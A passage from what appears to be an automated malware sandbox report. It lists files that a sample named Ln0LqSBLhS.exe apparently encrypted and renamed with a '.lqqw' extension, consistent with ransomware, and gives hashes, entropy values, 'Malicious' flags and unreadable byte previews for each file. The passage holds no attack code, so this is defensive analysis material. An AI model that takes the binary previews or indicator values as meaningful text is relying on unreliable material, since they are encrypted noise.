                                                                                                                                                                                                    SSDEEP:192:MonvjXYSw6FOJvNkIaQr4GEYBIwUX82BYEbL8ge8F69/8:bvjdeP7r4GEYBIwUX82BYEPA8FV
                                                                                                                                                                                                    MD5:5226FCD10566EAF13AF135B1C59AEF57
                                                                                                                                                                                                    SHA1:66B92D559506C899AA7EF49067C6E3C1BE07DDCE
                                                                                                                                                                                                    SHA-256:CDEBE7C4E5D0232D5599F48C85CE7E55A66472D1E10B4683B14951ED3A5EE994
                                                                                                                                                                                                    SHA-512:B9C0D952936EDD509513847326944C3241AAB602F6109AC289C694EBC0A6C7EE29448694121B2648FFF16F4F5607293DB3F052102CD1AB6A34A9C7421533055A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......B....oY.........X.&pG.LL\.n...E....$..!...=...T.~...x.......>.g~_;..K..q].e.Wq..'...Q.k..$.b...(@..0qF9`......Gt^.....;..].....'....-..T..,/.m?..5.6t..QgP.-.-..<W..............uuV...v.j.......b..r...n$R[.........7....;.2..A\.....dz.^......Q...~.v4.X..>?.....V.%[...M-A.k..F.2.1.]......\....8R...TA&......i......+.ay".B..Z2.5.....Y..%.`...e....;>..a.r...LHWP..4b...[....j.P.x...Ni....R^.].g..|.A.z.....V.....u..../M....}.Dy.......6...L...F.NN...W.U.v.'.T.D6.r.";.{8.2hs.&C..R~.=........K..'...O.-.......w.W..U.".3.(..p..@.....7W..A.@......W.d...L^..9e..4...:.H..g..}'H...U......0|.^..sS....6..A.5...K..h..mX..2^.6W..1>..G.N./O-....@.5..T.~.%v;Q.l....P...Vf..ez...p.m%m.M....o[u..~/.}.Z.7.E...+K..V.`....O..%(.=2h.&'.+.2.A7..on{U..1lb........v.u.7..w....v..~K...C....."{....+..P....Ui...Y.....L..{...]..C?......A.-.J.y.f6..t..G..d:..*...m...~...#.0........fo]:..f.5...ez^.....n..`6R..~_.BP............8..&.BY..."5.T-........3.4...&....."wV...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.997047849720848
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:+sYns49MwJ8LJTbG3ltYokylRpY9s0jrUPZR/Dd9LAsbkshc:+s0mVTbG375/lnYwDLlbXhc
                                                                                                                                                                                                    MD5:B5AA56E0771144506F34AE9B5FE420F6
                                                                                                                                                                                                    SHA1:C1822CA921955225CD3962B69F74F13E2D03F884
                                                                                                                                                                                                    SHA-256:62ED2A9F44289071DC12A2A9B6C4CE66B594C513A4C8CFD562626E1B34B851D8
                                                                                                                                                                                                    SHA-512:C57D08D3F9E9B030F7349D26AB5E473E300A644E6B1CCAEC87D29DD00E6280142FA81DFCF965DDF8CEF0311CFE64F64A6D19F2CA656A4746F1B397E944420F04
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .".-p..|m.3]tj... .w6.0..xR...T6o.j...n[DZ.1D9..Ovv}..n.....j.q9......9,%a.)C.....A..:n..z)S..:......z....k...f.[\.Z.....*..t<S...BrDAp..'n..I.....x@....".|..N.....P./7A...c.3.x....^Y=....%.'D.J.............B`..P....f(......h1pT/}.N....Wf.\T...6(.....Ahx.^5..k..=v..(.b..+g!j....k.-...ImgA...M.I...z....^..U%-do...~...#.ufw.D.......@k...........B4.p0.m..."i...z&...x..y......l..m...B...F.C9.z.I+k......R U.c..>..x...E8..U.5.......(...._..,...H.../.c....1)r..w(....*.......j.7..:...4...........P...y...-...4K....Sd!.R4t....0.1..JKO`........7.l.t..b.Qd.K.O.d:...%.l*=....t.t$........]A..3..j.5..&e.2F.0..5D..>..,3....=..&.U..p+.x.E....4@7......s..<.gRz..._i.....6+...q..4:)7.e_......`.....q..c\..?%.Y.u/.................5.....n..0..}c.).Y@..{u...Hb..>@.R...x1.].k....@.@.....z..<.$.m...6..F..\.;:.e..7WyF.ht.[.=U.{<..L0.......M.....'.o.AF..,..>..3.}C.......,G...-..eo....B..@`.&.5..}.y..&WU.F..K.Y..^..l./wT+..._z.?.a...j_1dU.ez..ZHT.I.(w
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977436487742942
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UEhigzi0qKEG0h/A21uOfeGkCzzrTX47mBdepqV:UPkLq3d1ffHTUGPV
                                                                                                                                                                                                    MD5:4D6FB04E6A12130FEEBB769D446E9695
                                                                                                                                                                                                    SHA1:C8184E54719C6C9D4CF5D2B558FD113FF34895D4
                                                                                                                                                                                                    SHA-256:68B900C952746658711DA73F86E16469541BA8DF9ADC928DE8A3C47E8F194C59
                                                                                                                                                                                                    SHA-512:7D8AC9FE39F27781BB4F890DE48DCB17FEC7833021CAB744E51D36761330CA1F66165CAAF57F3667D5DF4E92EC8D47CB1D45119A6023C19D41A437931338378C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .7..Lt`lx.q.1.3us...Y.7.....M.v.8......8..y.6..i.<,...e7.b#1....".uHnX....}x.y.....(...[.aT.&w.-.n.......K(.).U.e.......z......#...Q..l.%...z.......0..\.=..X..5....J..,E.Z.""....XH......Q..;|H4w9..P....}.d.......v^...A.g"'....s...A....u;..C. 6)...9s.:..{.Jq.....2.....".U..5'1..D.]r...,.h.*..S../.2..R...;^...h.<....I....h+!.z.%0.H....7..k......;.`...l.C.|.Vm=.V..E.;7.O{.5O..;..x.e.&^...NS.........V...K_ba....#W.&..."..CKW.ql\`..Efg..t.My..1.v.J......@..t.2PN............Q..=.x......m2.b9..r..|.[..m.R..;....1...8.)T.-...w..S.B.:.....:.u.....xh}:.R.9.s(...P.....1WX...d#..R.R..yb`.!...D...Ic..N?AS.L.=D.....s/..Pum....f#..5QP.....#.U......+.....^Te..zi/UE1....e0F........GU....y.K..........cx..Rg......r.X..."{.w.&w.[ZU...$...=h...I.<i. .m.....3.0........c.D...Y^F{(`w......,W.S3..ma..]..w\.....*.Cz...|....f.yQ...G]......g.k.n[.........zUr../.S...........H./I./.....yO..v&....%3.k..k..CrU.,..!.9='.s7u..".{.....(01.c=.-pF.g1....a...zkp.;Q.....ZK
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.973484763275726
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:QTBTSymltXQd8jrMZLvf5tzFGuKd+5Gyrajn3xee9K+:QhSy8Ad83M1X5tznKw5Gyejwe9K+
                                                                                                                                                                                                    MD5:1B5F74016873AD104215BB367BD02F51
                                                                                                                                                                                                    SHA1:A5D4DDBDA01C7C159327487C5DE13B16B1AD17C9
                                                                                                                                                                                                    SHA-256:7AFE8F72534BABADDBF991E6C16AE0712F5F3778E350771F570E86C910431622
                                                                                                                                                                                                    SHA-512:A2BAD73C745FA67A0933BF481C471F958B2D3BBAB0B8480FE303EE214F50246FCD28384BF38347F84A92E82462FA1B87DBCA40C7B41972000861143BA96838F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Y.6....1..kI........n.....L.......!.'...M......X`..[.O.........w..d..aC .FvO....5k5..L......H..."..........$......@..........X..[..cit.Z..x....If....D.p&uf...<_.........'..Ef^......|=?.....&..fNmh.-..=.A1='.Z.Y@....XD.N.H.h.Q....)..w......S.)..[*i.4...E.':!..p.{_..../.Z..R[.TG.d...b.y."U.W..EB..;m>zx....<..L...2....$k.a.Lw.;.2....Y.O..........3..z.....L.E.]*.B..........R.X8....=.q.C......T.o.c.#...#..a....Y..m.E)...5.l.......].+.A.@....5'....hM...6..F.....fw..Kv.....zZ...&OD.... .y.Q2..._L.....9.f.\..k..U..4.e...y.^.)...x..._n.j.h...W....q...9Jpp.3.....5....L..L.Y^.9cw.$q._^..rT`...b.3kC|].Y.H._6.%<.t.].Z.......K....D.f..I.Z@F,.w;......mE_......D.K...*&...pL....>.r..'...do.#)m...?....QW_..M._..<J*..${&.D.Y.D........_.BAl....T..gE;))......M........A..1..m2....9X....|..cUmx..`V....=&.....L..dCr71.xdZh....)..~..ZV...z..\..+....v..IQ..c653.x1Z[..7..!...O.1R...,P.>........F.S...w....3..k0.Z.-.P7.fE..t.X}*...)..g..'%.&W..<p$.......
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\AdobeARM.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4627
                                                                                                                                                                                                    Entropy (8bit):7.958351321744954
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:gdR1JjjhzoyLOXzmvRPW2Y4TMYJXWOep0Rw1cSgiZR/o67KAR9iRL:4PjhU3zmvx3TXc04cSVZKATYL
                                                                                                                                                                                                    MD5:A13807CA081EE599F1619A88E0EDAC46
                                                                                                                                                                                                    SHA1:A0932021BE538E9E46B84282786241C9615DB26E
                                                                                                                                                                                                    SHA-256:78018BD133670BD692A14F7DC67785A82DEBA39B44F12C756D96E17824272517
                                                                                                                                                                                                    SHA-512:DD76A791C6BCB8EF6F869F4CBE46369D8848729F33580A369B3450429D1D2F038C50C5F6BCA525027C0916376DA23D0C7B74242141786DB9C836583B124636D0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ~X....#.....Rf....(x....|.U....L.=.l.........*.;7+.K...s.....rRhLp.....=^.D.^.{....3h._}....\.v.#Xh...+../..y.U.K..c....2.b.....JO..^...w.J.*..? =..?....G..y....L0..........#..c..8.:..Qv.....>...,...e.....&.z...$.......T.pH`.....?4....9.v\..#W.......TI.EsP.;U.|pa.M..5...L#.|..<+.........!].'u.K..J@.6.....+.;..q.......2.P84..w.'..)i 0..<...s..u7....R..Pa}.s...29...f.`.H.M\U..c.1....}wv.;.u.f1..bJR..SV..>.O.k$.r.{.34V.Q.>u....\}.Y..%...........H...-?.* :..b...{b?..},......!....idf.....K.!...^.^.G...I.G.g.=.i.c....4....z....!.:n!..>..~..|<..t.&.-..i.mD!.....=.:G.vsYX.%Fa.Z.m.J....ik/.V...m..o...K....|.k.....6D~.m....;F..=...kXZ..rTs+$n[.%av)...|{n......Z*.I....~siq....{R.5..`..mo.08.....E\U..e...B....Q.......,8.8.}.49$......>..L.....`.H.oA.p.'f..I.;......J..4V.L.S...t...!.....1y...h&...rN..0wZ..G.....).J.1\..\.=..e.....2fo.<..Gp;<. .x.8..$ek.Vi.?.8......!.RJUO..4...K.e..z...y]..:..X......Hxk.~. ....<..L...0..t...18S..._.\w.....^...{....[".
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\CR_8F2A8.tmp\setup.exe.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998730968461879
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:UhsP7Tm6OFX99a+HgP7XVmN5zROy/ZfI6ZKuVggW8505Pb/FJNhmi/6Qq6:6A74FN8+HgPwN5syhfI6Zk8ex/FTfpB
                                                                                                                                                                                                    MD5:B6E44C01650B463ABD22C75D1D69E95A
                                                                                                                                                                                                    SHA1:529BBF46D427A9E12943C2854E1FB4C421FA27B9
                                                                                                                                                                                                    SHA-256:247E81D121C94C4B6CD6F0573E4B1111E8FC9A3D2A8FE388BDE4BDC5594722E2
                                                                                                                                                                                                    SHA-512:AAADF2DD92FF142A2BCC665FBAB845985E74820DDB3426093A82CAAA87E3802A690D38012FCF687F2B5AC8264FB8B9B8264BEE907B55037194A816B28132D90C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....j...D+.m.(?=.U..m.....Wwnp..T3#...7....L.._.3.......Cah...{..i..T..).d...P.........@.W.p.Z0h.."1Q.0.K.B9.\..yX..S...E.li...A...9{...(.+....g...[.V2..w.>......}GP...Z-....~..;.F..E.........W..D..e,'..~..W`.........*....v...%b.N..R.7-.:....s...!..7g....}UOrx.}....RHVb1n..(.T_.8...~.K..........?.?....c..~.U2.w.S..s.?x.._...T|).v..G.....L...z^;.P2ED...c....P..H......d....G.....9...[......@...&..|g;...V.=i<*N`..Y2,.*.0`+..2w.V~.Z....H.....;..|[o}.}.<9.8f.qz./.JY*....X5%dp..L....@2.A.a......*....*L#G....8.x.CA..^b8l..4.[.X..-`..+..zz).2M..4.....%..o.v%.*m,.X.qG..Z.kh...7ZSf0.2u^$P......s..D.:.FT!l.{V..o......6vca.S..r}>...^.3.#...n 6.r.oN.nw.....5`.;.A../?..y.........-_......g5...2|./.........n&1..q.6\...eS.9W..I...o.....d.......k^%..lFva,.!h'H......e...R1.....4.i..2.^..\.{+..<.h..`..`.~.~..xq....:..]..F...r.Y....p..Bt.\....Q{.....d*N......v........7..Pi...K...$>......@.........'.r.\(...M....w`^....t.vo.J....\...3N...jb.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\Low\JavaDeployReg.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                    Entropy (8bit):7.399005904005575
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:U7gT/UW+amyFRG3pOQjOdxpO76KdMKnEFPplLF82cG+Niy80zYoD75dExcii96Z:Uy563gNo76KeKnclW7G+NwUacii9a
                                                                                                                                                                                                    MD5:5CDB0A4842832196412D6F7EC5236EA0
                                                                                                                                                                                                    SHA1:87A79DFCE5E616E4C3A6FC71615DEB53F4153D21
                                                                                                                                                                                                    SHA-256:13352BC7D5C488544B74D42629CD3ED00EEC7406FC44BF7F1BBFBEF66B139CCE
                                                                                                                                                                                                    SHA-512:BDAFC7364B739447BE8722CCF817B6A3E205FDA37198CA502AC673EA2E5771C42B183D94102E94424E3BC9B689D9B75660DE3B973F06532E2D1729559414C779
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .`.R;..n6R.4.V....:.A.....V;....f...%...'.].Z..R.)..,.H...c0X..:.?...k.v.h..._.fD86.y .ST. .]..~.......Rp..vd..kg.,.........x...j.M9.qs...i.-.Z...Urg;..b.(.O>...D..s......P-C3.&LA.AP.m.*."01...d.T._1.3....n....6...i.yG,.v}....HFW..}L....]F..z....{..md./......y.../h..}|k.D...3..Mx.c.8L*.x.QG0../7P.....2..W..G....%.bz=._.L^5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\SetupExe(202007230953501D8).log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998908885680079
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:HliRfV8dNf9Z+LC+b731R3Yx6fqeMUFDAmnnbLpzGlI:Hsf2lCjxS6lFDnpqlI
                                                                                                                                                                                                    MD5:E4EA7834328694F0AEF2742D6A377ED5
                                                                                                                                                                                                    SHA1:E4084D69B26099E10E3EB29DD29B2BC88B517625
                                                                                                                                                                                                    SHA-256:1374436B9F4958ADC712FA1851E9915785D31A831FEAE7DA15E897404EA6B885
                                                                                                                                                                                                    SHA-512:8D736AFE182E86C9791B3505239B031B9185F898D373DD37719595D9D2D902B7D48A4AB8073AE0E900DB5A32A925A2003CC78FD158D673A1762087C7DF55F466
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .P....P.g.J..V......;.8..o.....rw.{....,.!..m.&...c...:kl}`.h...19.&......i....I.r....As3Y...Cd....y....z.........V.yQT..1Pw.A...6.p.=c..~2.d`.5.\.&NU.;n.eJ.r.Ob=.f..7.._D.'m...T._..{>...6...%...[......*.98......j.E(..5I.v..e....9.L.dJ......&.n.6...gT.$..E0.i..G.....AAVX)....-6.3..^...y.g..,......[..QM7.8C#..\T..j..6..@.....y....1.....xA.y........S..[7Pu.P}+......T..%A_}.1..c..,...PbZ........K4..r`.....g.0.P.......c.....$o.../...ReSV....z~.p.M.zI..y...F..X.RA.x.g..l.....A....s.h..9.R....f~`.....dw..%u&...5.c...r+.7(..........1.......F.RW..........N.q ....?}.!.zT....qF{.6~.[=..l...]...d..L*.... C.Y.n.i.y2..Eq.T.F.....y.S ]..k....../.t.Pb..q..Q.y._+..Z....Y..T.4...S,.{$4}..:6.!.35.U.v...;_..6hs.#e..u.,#m\ZK4.J.H..]...B..).y.._7...MEt.&K#...,<.Q...p..*U.........s.mbKP.q......_...-[...+x><.:..X..:6...eBFl#.t.N9...v...\%....B.hH....h7o..>]5......OS.o.6....3.>5..$l....*.\.v..(...B.........EZO....n.M W....t.1O...c..U..i.$..+`.1......q....e.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\aria-debug-5924.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):799
                                                                                                                                                                                                    Entropy (8bit):7.718377510658081
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:J6EBoPxHiWuiURRjU7ZsSFn2BoN40uUsZxMebaXbD:NKiWurRjU2mUNlwkarD
                                                                                                                                                                                                    MD5:DDD64268E79B2BABF6DD41A1C5419C92
                                                                                                                                                                                                    SHA1:6B35A07779AECFAD757BC7EEEF4F3CD77AB2EFE9
                                                                                                                                                                                                    SHA-256:E5631877A2D4DE811E6E34294342CC2A104897CD77A4C6B850A12886F620D900
                                                                                                                                                                                                    SHA-512:863E25FD32E2A54807544BBC6C322002E428CACAD4B1A2E7B287A052EF2584FE8164E3A6221FA6A07227DBC9FBDAD85EE306B6B0EEE9E90802F6E6CCF5FD4928
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...`......SK.*....n.yC}...&.."...R...m....ol....=.B.W.3......!..u.w..`=...(r."<.V.u....un..%..n..f..'.lrc.|.@3p.|.j.D.~..}....0l.....[...*.)g.'....[.........W..v|....g...sz...c..F..N.......)...".-?b...s..`.[....1.^..7.`.+.~.K.R_y...$.P.|.$t."Q...(@.....~..#..._.t.......8{...H.A=..b.y...e......K.K,.Z*..(.5..?..c0".M.......)...G.X..L.3.O...'.d..lj.0.3%3.12.P....O....9.......T...........i...2..[65e3g.<..?-.{..Dmj9......0.E..{..$..Q.7.....&...A.+.x....:.......||.S..cHb.i.....F.T..ol.&.u.D.?..h^.h..Qt...96..lSSV..o..N~...1+/.]..5LN.~....k".Nj....xb..F.( ..]Q[..#.2^...r...nz.z.~=.[./.\....[..1i.h..a.....y.....g......[...z....s.c.cF......A+.gE..m....AVJ..K.U..c..#N....'`.<.(~.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\chrome_installer.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21743
                                                                                                                                                                                                    Entropy (8bit):7.991574221119138
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:sjCoUyKnRXeXpUXmlVL4ESAigA3hdab65g83wJRaMd4w/0NhY98AsCQg:s6yKCVld4PB53hdau5gj7f//0NIZhj
                                                                                                                                                                                                    MD5:C09B921B61B6E23E6098D99845F12A7B
                                                                                                                                                                                                    SHA1:2B175CA0B89398F653853F6915F32BB5DD2591FA
                                                                                                                                                                                                    SHA-256:A4744616727BC7012D73A7D52681DE2CDA368B10AA6932E0B20284D82D086166
                                                                                                                                                                                                    SHA-512:2B25B93A9BB25F38527C4C2E38AEECF9D1888954476413BCC47F76DFB33DD0FD73CBCF3FD8565CC0ADB24F7FA9287ABD2D0BE7A406A4D01C4AFB9A4D56D5CF68
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....,I.U....ju.#Ez{s..*.^O....w.`....N.......s..g.&p..J....*.?-.dBz&.:.....pB5.....N+kB<mR5nj$-....P.d.K..o.A2H=.e=/.3...{...z.w7U.....U*.xo.V.~..p...6(.N#..fJ.......9#D.IL...P.....5.u!42.(w....b...K.S.{.FN#...F..p`Wq.......e..TEX.....t.o.5OV..&.v..r74.......M....s....T.Yq$ PE........8.m,.[.)......=7.gb..H.P. ....V...4.?S...l...r...S.Q.X..M......|..R...65.V.V=....|..].{...W......q<...J.....W.Y...y...7..X.....4P.$.Q.6:&=..T..V[;=.....F:.........!.z.....{..../.j...k.../....[..R"W.p...k\"q.....b.@-lwE.).,.......8...'".L.....oK......{....Z..4.R..E..xR.XOKf..R.U.o.+...m!C...../_F.f5.\....j.=..NTZ....3.p..X.=...dz..sjH.6.]/@...bn.R)^E.g8^..._.@.M...$.V.....gg..-.6.Q...1.z.k.z..5.f...3.cV....o,..*..@..R....@.f."..'y......(.....^._.(.g............I9...w..]ro...@e....y..(...~\.9K.hO..e.rxI.vZ{....|<k._b..yx.?......S...v.,6.My.o.d.....A...QR.So.B.c)!]............6..D`.f.-&c$.Q.P.s.C..}.D..)=..\i.=.u..hMJ..ly.*27...3..eW+.T.i8O.h._...9.....U..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temp\pl3ayzgp.mcm\unarchiver.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):373
                                                                                                                                                                                                    Entropy (8bit):7.333750495061761
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:KUEGWGO1gpyRywmjfnWkJ/Md+12um7aW1xlM4Aat7xsw8/gHB42iLki75dExciik:KUE5GOycZmxJ/u+1Jm7aWHlM4VnvHB7L
                                                                                                                                                                                                    MD5:42394232ABBE7FF5D7622616CE3DE1DA
                                                                                                                                                                                                    SHA1:7C3B273C391423A7B51696477E5F9CC6DA43674B
                                                                                                                                                                                                    SHA-256:174A76C7F36C37E8785FB94502C8BD5C643A2CAE41C6505493EEBDC338890A8B
                                                                                                                                                                                                    SHA-512:15CFDBF1073011F4081EB4D4ECEA3303183928040E0F0EE201F9213F3D77ACD261BDA1248F814D232EB7BA62AC575E78049C17765AB2C7D0DDB306065F92658A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .F..".......v...L.].j...h......:L7..P....CX.39d27D.&.{....,C.w...H.4.?....'...^...#O5..&.....J=+..D....w}..........P...Y.O.)..Y.........I...Q...U..P(M.&..l.}...|5....#...$..d..q.<je..9......S4%.e.l.o.....%=R..qX~.c..6x...Zd|b%.jI@)~>.0...........:..e./........?...w.S....2.orJ5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2[1].js.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99879280071181
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:8fX4nU8opKy47Ymhy2RMSg96WiGUZ/h9YZ5DEiubhxiwirX0XIrmN0:8fKU8oEyOPh5Onuw6hxijrX9rmG
                                                                                                                                                                                                    MD5:636442AE71595200744AA6F343E377AF
                                                                                                                                                                                                    SHA1:89C420A999865C5F639E74EE3C8011FFC6986B7F
                                                                                                                                                                                                    SHA-256:C72E8472DC0C3D49539A56AA691D5FCA3503A68DD9AFBD4165D6F271BE006E1E
                                                                                                                                                                                                    SHA-512:9D067461A521AB70FAEDE6CA0F6E65ACD36FB40C318C005ECFC7F924B9D553F7EEF3C1FD8C0BA1F636C3D9C687A8F93E45FD05C171A4D766D954398A451C7C71
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: j.y5+..wT.5.......y..+.1R...JfN5mj....!ue..H..{j..=k...=..r..S.;`....._}.r%3..F..F."z.....3..P.>.H.P.....h..)\O...2$'.hX..s{c....p...v7..E.p.39.3........5.fn3r....[.L....OF/>....Z...5a>L.....zx=.E~-...w.>..uk.X..r..G..(m...7.....db...0..........M.1#./....K9\....hD..^<RX.6."....D.1.yY..0mL.c.....-5...f.T.....a..<4i.K...FY.b..|..4\.>}..V....`(..=O`'...M&...%K..9.P.M......?.9.$.....q.>..M2...5.........5}.p..R4..PV......o.~.F....acFD*.=.._....0......\.2G4.j...n....Z..7{z#../....fB.l....}...R.....[....T.@.#^..".......SqC*..ssm...&........P..{6O.].('..X..n..~v(yK<D.068.._.Rsj].ml..HLR....+.bw@.....F..h.W.L.............g......._.....Y....J...F!~.....#}..!.......W<V.2.h..?T.......No'..G` 869o..-..Pk.lj..`.....#..MCt...A\.q...,....E../.N..\.....l....Ys.....,..g.}.P:.q...]..f\LK...3...z..&.......#.{.K.s~.1.J.....j(.-.r3..t.5.......r..\5'hk...........!h=..db...v.......Z..../.G.k.E?..u.@(..M-......[..>..}s...(3l..".?.>........jp&..2_..S.WA...[qV.R.p..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\a5ea21[1].ico.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1087
                                                                                                                                                                                                    Entropy (8bit):7.800108923236669
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:oPs0bZEKSUPs43WsZED0/V7ObyKC+IWEELG1bD:oE0bZj9Pgzy/+RExlD
                                                                                                                                                                                                    MD5:59CD962C0F92801F69787812E29A840F
                                                                                                                                                                                                    SHA1:D98F2B5DA420C97EB1236CFBC95AE7C258085C91
                                                                                                                                                                                                    SHA-256:6924211C1992DCCE5A5405114B8F833438F47A3940E2896CC9FC3E83D8AC5FCA
                                                                                                                                                                                                    SHA-512:B134752AA8E66EC11EFC298EBDB73324B3B2988F7657DDB59B56D9447BFA126B909CACB281C35595CAC598C0A683FB1479E8F26CAEB5D251009303A62C9A5EE0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
